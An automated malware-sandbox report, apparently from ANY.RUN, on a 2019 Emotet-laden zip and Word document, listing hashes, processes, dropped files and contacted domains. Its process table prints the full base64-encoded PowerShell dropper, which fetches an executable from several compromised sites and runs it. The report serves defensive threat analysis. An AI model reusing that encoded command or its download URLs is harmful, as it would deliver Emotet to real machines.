File name: | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834.zip |
Full analysis: | https://app.any.run/tasks/f0add28d-d680-41b2-8f84-5cdfa92bb602 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 19, 2019, 06:18:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 70DCDBE1E0186FBE98375B72FAC5C5AD |
SHA1: | 695F67AB37C34F3D539517846EF5F1E01B4874BB |
SHA256: | 58CD281561DAB7638621EBDBF67D0A88CED6D8186201847FEE88B30E768FCA3E |
SSDEEP: | 3072:HQTXsCiaXMT+rF3xrUc5uQJCFgIdhZFo2B8wDT1:bnAc+B3x5w+oLy2BZDp |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:18 18:48:15 |
ZipCRC: | 0x0164785e |
ZipCompressedSize: | 168522 |
ZipUncompressedSize: | 328128 |
ZipFileName: | f8ee5044ff1c81384ecdd4735d5f8d0d93bee834 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3556 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\f8ee5044ff1c81384ecdd4735d5f8d0d93bee834.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\test.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3544 | powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRF1D7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A953A6A.wmf | wmf | |
MD5:56D945AAC03C961807122960C165C060 | SHA256:FA3C988A8A6319D173C720EBA9F66A3CE67EC605F3FCCC8EB604F7B552F21151 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:1932E642BF49688FF8AAD32BE63B1B34 | SHA256:150E7C5A0F81609374EBE46AF172770E364023C1A723A5AF4E245CA6B68FE649 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\test.doc.LNK | lnk | |
MD5:4B6696D5583996B1E177EA2ADBA50ADE | SHA256:D630D572D08F4F37C92BE1568D651DED098FB65CCC44217F74E6DB6E68FDFF14 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\32AEE669.wmf | wmf | |
MD5:5C4F83E134A72503FCF81E7E63F4F4AD | SHA256:E6B63B63938C82998B52AB441245F483F24AF2CAE8C6CC60DBF4A5E8CB491F7D | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\26553D5F.wmf | wmf | |
MD5:A98D69A6BC6F4FA0508C1BB2A8F6C66B | SHA256:6E12BE59FFFD2CE32FCBC45DB9D596697CE6A0B7979D47AB4C95B310F549615E | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BACA0ACD.wmf | wmf | |
MD5:8E6DEF5B61985AAA923C8E4E256082EC | SHA256:D54FC5860A92CD9FEDF3A1A3A83876C60EF282C3729C5625FC97BDEAA52452EC | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:317ED78CB6799C0D98E0C3A06DC2F53F | SHA256:1D238A9DBE4B9B7A9F02251CE66BEA984D8D20AE43F4EADE452BB84ABB65DF73 | |||
3556 | WinRAR.exe | C:\Users\admin\Desktop\f8ee5044ff1c81384ecdd4735d5f8d0d93bee834 | document | |
MD5:75FCE03112C190FE3405473CAC28502D | SHA256:44D88CC1429253B00B514D1594422D22C7A0E08523D06CF756E6606A852D6ED8 | |||
3608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E6350DC5.wmf | wmf | |
MD5:2FCE5B8B6A3A0D34C293CE21237B0F3D | SHA256:52005A145BACF54D39B82EC7299B897AC7AE83E4C8CB4D87C8701D71950FEF28 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3544 | powershell.exe | 104.27.132.144:443 | mnpasalubong.com | Cloudflare Inc | US | shared |
3544 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com |
| suspicious |
dns.msftncsi.com |
| shared |
mnpasalubong.com |
| unknown |